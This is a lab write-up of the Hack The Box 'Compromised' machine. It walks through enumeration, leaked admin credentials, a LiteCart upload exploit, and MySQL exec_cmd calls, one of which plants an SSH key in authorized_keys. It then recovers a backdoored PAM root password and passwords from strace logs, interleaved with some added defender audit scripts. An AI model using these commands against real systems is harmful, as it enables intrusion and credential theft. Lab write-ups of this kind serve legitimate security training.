NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-14 21:00 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:00
Completed NSE at 21:00, 0.00s elapsed
Initiating NSE at 21:00
Completed NSE at 21:00, 0.00s elapsed
Initiating NSE at 21:00
Completed NSE at 21:00, 0.00s elapsed
Initiating Ping Scan at 21:00
Scanning 10.10.10.207 [4 ports]
Completed Ping Scan at 21:00, 0.34s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 21:00
Scanning compromised.htb (10.10.10.207) [1000 ports]
Discovered open port 80/tcp on 10.10.10.207
Discovered open port 22/tcp on 10.10.10.207
Completed SYN Stealth Scan at 21:01, 15.68s elapsed (1000 total ports)
Initiating Service scan at 21:01
Scanning 2 services on compromised.htb (10.10.10.207)
Completed Service scan at 21:01, 6.57s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against compromised.htb (10.10.10.207)
Retrying OS detection (try #2) against compromised.htb (10.10.10.207)
Initiating Traceroute at 21:01
Completed Traceroute at 21:01, 0.29s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 21:01
Completed Parallel DNS resolution of 2 hosts. at 21:01, 0.16s elapsed
NSE: Script scanning 10.10.10.207.
Initiating NSE at 21:01
Completed NSE at 21:01, 8.43s elapsed
Initiating NSE at 21:01
Completed NSE at 21:01, 1.13s elapsed
Initiating NSE at 21:01
Completed NSE at 21:01, 0.00s elapsed
Nmap scan report for compromised.htb (10.10.10.207)
Host is up (0.28s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 6e:da:5c:8e:8e:fb:8e:75:27:4a:b9:2a:59:cd:4b:cb (RSA)
|   256 d5:c5:b3:0d:c8:b6:69:e4:fb:13:a3:81:4a:15:16:d2 (ECDSA)
|_  256 35:6a:ee:af:dc:f8:5e:67:0d:bb:f3:ab:18:64:47:90 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: FD8AFB6FFE392F9ED98CC0B1B37B9A5D
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Legitimate Rubber Ducks | Online Store
|_Requested resource was http://compromised.htb/shop/en/
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.32 (91%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Adtran 424RG FTTH gateway (86%), Linux 2.6.32 - 3.1 (86%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 35.219 days (since Mon Aug 10 15:46:07 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   278.78 ms 10.10.14.1
2   278.87 ms compromised.htb (10.10.10.207)

NSE: Script Post-scanning.
Initiating NSE at 21:01
Completed NSE at 21:01, 0.00s elapsed
Initiating NSE at 21:01
Completed NSE at 21:01, 0.00s elapsed
Initiating NSE at 21:01
Completed NSE at 21:01, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.99 seconds
           Raw packets sent: 2088 (95.460KB) | Rcvd: 42 (2.536KB)
PORT 80
Let's use gobuster:
┌─[root@liquid]─[~]
└──╼ #gobuster dir -u http://10.10.10.207 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.207
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/09/14 21:02:13 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/backup (Status: 301)
/index.php (Status: 302)
/server-status (Status: 403)
/shop (Status: 301)
===============================================================
2020/09/14 21:04:24 Finished
===============================================================
We found a directory named /backup.
So let's pull it out!!!
It is a backup of the website, where we may find data that helps with a foothold.
Inside it there is an entry named /.log2301c9430d8593ae.txt, so let's open it.
User: admin Passwd: theNextGenSt0r3!~
Here we got the creds.
Let's enumerate more files.
In the includes directory we see the password salt hash and the database password, along with the admin creds we already got.
Now that we have admin, we need an exploit for LiteCart.
┌─[✗]─[root@liquid]─[~/Desktop/HTB/compromise]
└──╼ #python 45267.py -t http://10.10.10.207/shop/admin -u admin -p 'theNextGenSt0r3!~'
The exploit runs, but we could not get a shell.
So we will still use it, but since it does not give us a shell, let's do the steps manually as described in the exploit.
We see that phpinfo works but commands do not, so we need another script for this. We also have to change application/x-php to application/xml in Burp, as shown in the exploit we found on exploit-db, so that the upload goes through; that is why it can upload the shell but cannot run shell commands.
Let's figure this out: we have a PHP exploit script that could work here.
Here we have exploit.php, which will work; you just need to change the value in pwn("id").
So upload it the same way we did for phpinfo, then navigate to the file and run it:
http://10.10.10.207/shop/vqmod/xml/exploit.php
Here you will see this.
We still cannot get a shell, since we have no bash execution, so we have to get everything from here.
We can see /etc/passwd, which shows that mysql has bash, and we also have creds for its database.
So for now we only have the MySQL creds to work with; let's use that database and get more data.
Here I had to take help from my Discord friend.
mysql -u root -pchangethis -e "SELECT * FROM mysql.func;"
So let's run some commands.
The main point about the MySQL command part is that we can exec a command through it, as we now know, so its format would be like this:
mysql -u root -pchangethis -e "SELECT trim(trailing char(0x00) from exec_cmd(\"id\"));"
You will see its output, since we can execute commands here.
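The exec_cmd function only exists because someone registered a UDF in mysql.func, which a stock install never has. As an added defender-side audit (my own example, not from the walkthrough), this sh script lists every registered UDF and checks whether its library is even owned by a package; the rows, the library name udf_example.so and PLUGIN_DIR are constructed stand-ins.

```shell
#!/bin/sh
# Constructed stand-in for the real query:
#   mysql -u root -p -N -B -e "SELECT name, ret, dl, type FROM mysql.func"
# (-N drops the header, -B gives tab-separated rows). PLUGIN_DIR stands in for
# the server's plugin_dir (SHOW VARIABLES LIKE 'plugin_dir'); the function and
# library names below are hypothetical.
PLUGIN_DIR="${PLUGIN_DIR:-$(mktemp -d)}"
: > "$PLUGIN_DIR/udf_example.so"      # constructed empty stand-in for the .so
SAMPLE_FUNC_ROWS="$(printf 'exec_cmd\t0\tudf_example.so\tfunction\nold_fn\t0\tgone.so\tfunction')"

# audit_udfs reads rows on stdin and prints "STATUS name library" for each:
#   MISSING-LIB  library no longer in plugin_dir (stale or cleaned-up entry)
#   PACKAGED     dpkg owns the file, so it came from an installed package
#   UNPACKAGED   a hand-dropped .so, which is the pattern behind exec_cmd here
audit_udfs() {
    dir="$1"
    tab="$(printf '\t')"
    while IFS="$tab" read -r name ret dl ftype; do
        [ -n "$name" ] || continue
        lib="$dir/$dl"
        if [ ! -f "$lib" ]; then
            status="MISSING-LIB"
        elif command -v dpkg >/dev/null 2>&1 && dpkg -S "$lib" >/dev/null 2>&1; then
            status="PACKAGED"
        else
            status="UNPACKAGED"
        fi
        printf '%s %s %s\n' "$status" "$name" "$dl"
    done
}

# Stand-alone demo over the constructed rows.
printf '%s\n' "$SAMPLE_FUNC_ROWS" | audit_udfs "$PLUGIN_DIR"
```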
So let's insert SSH keys into the mysql home directory and use them to get access as the mysql user.
GETTING USER ACCESS
Generate SSH keys
┌─[root@liquid]─[~/Desktop/HTB/compromise]
└──╼ #ssh-keygen -t ed25519
Generating public/private ed25519 key pair.
Enter file in which to save the key (/root/.ssh/id_ed25519): /root/Desktop/HTB/compromise/id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/Desktop/HTB/compromise/id_rsa
Your public key has been saved in /root/Desktop/HTB/compromise/id_rsa.pub
The key fingerprint is:
SHA256:dhR8pLv+av+8874tQwjdyZNvjGGlFQuFrT/2Rv5v7g4 root@liquid
The key's randomart image is:
+--[ED25519 256]--+
| .....+o.|
| .o....+|
| oo o.B |
| .....X |
| S o. o.* |
| . . .. o+=|
| . .E+o|
| .. .+.*|
| .o+o.+#&|
+----[SHA256]-----+
┌─[root@liquid]─[~/Desktop/HTB/compromise]
└──╼ #chmod 600 id_rsa
┌─[root@liquid]─[~/Desktop/HTB/compromise]
└──╼ #
Copy the public key into the mysql home directory:
mysql -u root -pchangethis -e "SELECT trim(trailing char(0x00) from exec_cmd(\"mkdir -p ~/.ssh; echo ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKoXKoSkzttsg2CfmG7V51HozuTqgw3sO09YPWlTeuEU root@liquid > ~/.ssh/authorized_keys\"));"
Then trigger it through the exploit page.
Now just SSH into the machine:
┌─[✗]─[root@liquid]─[~/Desktop/HTB/compromise]
└──╼ #ssh -i id_rsa mysql@10.10.10.207
Last login: Mon Sep 14 16:58:01 2020 from 10.10.14.201
mysql@compromised:~$ id
uid=111(mysql) gid=113(mysql) groups=113(mysql)
mysql@compromised:~$ hostname
compromised
mysql@compromised:~$
Now we have mysql access, but we still cannot get the user file. Since the box is called Compromised, let's check which files were changed when this machine was compromised:
mysql@compromised:~$ dpkg -V 2>/dev/null
??5?????? /boot/System.map-4.15.0-99-generic
??5?????? c /etc/apache2/apache2.conf
??5?????? c /etc/apache2/sites-available/000-default.conf
??5?????? /boot/vmlinuz-4.15.0-101-generic
??5?????? c /etc/sudoers
??5?????? c /etc/sudoers.d/README
??5?????? c /etc/at.deny
??5?????? c /etc/iscsi/iscsid.conf
??5?????? /boot/vmlinuz-4.15.0-99-generic
??5?????? /bin/nc.openbsd
??5?????? /boot/System.map-4.15.0-101-generic
??5?????? /var/lib/polkit-1/localauthority/10-vendor.d/systemd-networkd.pkla
??5?????? /lib/x86_64-linux-gnu/security/pam_unix.so
??5?????? c /etc/apparmor.d/usr.sbin.mysqld
??5?????? c /etc/mysql/mysql.conf.d/mysqld.cnf
mysql@compromised:~$
We see that a number of files were changed, but the interesting one is
/lib/x86_64-linux-gnu/security/pam_unix.so
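The same dpkg -V listing is what a defender would use to catch this: a modified PAM module or sudoers is a far stronger signal than an edited Apache conffile. As an added example (mine, not from the walkthrough), this sh filter keeps only the MD5 mismatches on such files; the sample listing is constructed to mirror the output above and the path patterns are my choice.

```shell
#!/bin/sh
# Constructed sample of `dpkg -V` output shaped like the listing above; the real
# run is `dpkg -V 2>/dev/null | flag_sensitive_changes`. In the 9-character result
# string the third position is the MD5 check: "5" means the file on disk no longer
# matches the package's recorded checksum. An optional "c" marks a conffile.
SAMPLE_DPKG_V="$(cat <<'EOF'
??5?????? /boot/System.map-4.15.0-99-generic
??5?????? c /etc/apache2/apache2.conf
??5?????? c /etc/sudoers
??5?????? /bin/nc.openbsd
??5?????? /lib/x86_64-linux-gnu/security/pam_unix.so
??5?????? c /etc/mysql/mysql.conf.d/mysqld.cnf
EOF
)"

# flag_sensitive_changes keeps MD5 mismatches only where an unexplained change is
# a strong backdoor indicator: PAM modules, sudoers, PAM and SSH config, and the
# su/login/sudo/passwd/netcat binaries. Conffile edits to Apache or MySQL are
# normal on a hand-configured server and are left out.
flag_sensitive_changes() {
    awk 'substr($1, 3, 1) == "5" {
        path = ($2 == "c") ? $3 : $2
        if (path ~ /^\/lib\/.*\/security\/pam_[^\/]*\.so$/ ||
            path ~ /^\/etc\/sudoers/ ||
            path ~ /^\/etc\/pam\.d\// ||
            path ~ /^\/etc\/ssh\// ||
            path ~ /^\/bin\/(nc|su|login)/ ||
            path ~ /^\/usr\/bin\/(sudo|passwd)$/)
            print path
    }'
}

# Stand-alone demo; on a real host follow each hit with `dpkg -S <path>` to find
# the owning package, then compare against a copy from a trusted mirror.
printf '%s\n' "$SAMPLE_DPKG_V" | flag_sensitive_changes
```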
So let's check pam_unix.so right here on the box, using this command:
objdump -D /lib/x86_64-linux-gnu/security/pam_unix.so | less
You will see some hex digits.
In the authenticate function we see these hex digits. Let's decode them and see what they actually are; this can also be done in Ghidra.
If we use the decoded string as the root password we get an authentication error, so just reverse it in Python and then try it again for root:
>>> "-2m28vnE3U~eklz"[::-1]
'zlke~U3Env82m2-'
>>>
GOT ROOT ACCESS
root : zlke~U3Env82m2-
mysql@compromised:~$ su root
Password:
root@compromised:/var/lib/mysql# cd
root@compromised:~# id
uid=0(root) gid=0(root) groups=0(root)
root@compromised:~# cat /root/root.txt
a33163ae366fab6d3ae951e41781c772
root@compromised:~# cat /home/sysadmin/user.txt
94b44b229b50ea261ff73c225dcb6d59
root@compromised:~#
Here we got root access. But there is still one more way, which I will be adding asap!!
2nd Part: user sysadmin access
We have mysql access, and we can get the sysadmin password through a grep command, like this:
mysql@compromised:~$ grep -nlri sysadmin strace-log.dat
Now we know the file that contains sysadmin; let's grep for password in it:
mysql@compromised:~$ cat strace-log.dat | grep password
22102 03:11:06 write(2, "mysql -u root --password='3*NLJE"..., 39) = 39
22227 03:11:09 execve("/usr/bin/mysql", ["mysql", "-u", "root", "--password=3*NLJE32I$Fe"], 0x55bc62467900 /* 21 vars */) = 0
22227 03:11:09 write(2, "[Warning] Using a password on th"..., 73) = 73
22102 03:11:10 write(2, "mysql -u root --password='3*NLJE"..., 39) = 39
22228 03:11:15 execve("/usr/bin/mysql", ["mysql", "-u", "root", "--password=changeme"], 0x55bc62467900 /* 21 vars */) = 0
22228 03:11:15 write(2, "[Warning] Using a password on th"..., 73) = 73
22102 03:11:16 write(2, "mysql -u root --password='change"..., 35) = 35
22229 03:11:18 execve("/usr/bin/mysql", ["mysql", "-u", "root", "--password=changethis"], 0x55bc62467900 /* 21 vars */) = 0
22229 03:11:18 write(2, "[Warning] Using a password on th"..., 73) = 73
22232 03:11:52 openat(AT_FDCWD, "/etc/pam.d/common-password", O_RDONLY) = 5
22232 03:11:52 read(5, "#\n# /etc/pam.d/common-password -"..., 4096) = 1440
22232 03:11:52 write(4, "[sudo] password for sysadmin: ", 30) = 30
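The password ended up in this file because it was passed on the command line, so strace recorded it inside execve(). Added example, not from the original post: an sh function that scans strace-style logs for that pattern and reports each hit with the secret redacted, so the finding can be filed without copying the password around again. The input lines are constructed and the password values are placeholders.

```shell
#!/bin/sh
# Constructed strace lines modelled on the strace-log.dat entries above;
# the credential values are placeholders, not the ones from the box.
SAMPLE_STRACE="$(cat <<'EOF'
22227 03:11:09 execve("/usr/bin/mysql", ["mysql", "-u", "root", "--password=Secret1!"], 0x55bc62467900 /* 21 vars */) = 0
22227 03:11:09 write(2, "[Warning] Using a password on th"..., 73) = 73
22230 03:11:20 execve("/usr/bin/mysql", ["mysql", "-u", "root", "-pHunter2"], 0x55bc62467900 /* 21 vars */) = 0
22232 03:11:52 openat(AT_FDCWD, "/etc/pam.d/common-password", O_RDONLY) = 5
EOF
)"

# find_cli_secrets: keep only execve() records whose argv carries a mysql-style
# credential (--password=... or -p...), then blank the value before printing.
# write() lines are skipped: they are the client echoing its own warning.
find_cli_secrets() {
    grep -E '^[0-9]+ [0-9:]+ execve\(' |
    grep -E '"(--password=[^"]+|-p[^"]+)"' |
    sed -E 's/"--password=[^"]*"/"--password=<REDACTED>"/g; s/"-p[^"]*"/"-p<REDACTED>"/g'
}

# Stand-alone demo over the constructed log; for a real capture:
#   find_cli_secrets < strace-log.dat
printf '%s\n' "$SAMPLE_STRACE" | find_cli_secrets
```

The same scan applies to auditd EXECVE records and shell history, which are the other places a command-line password lands.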
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE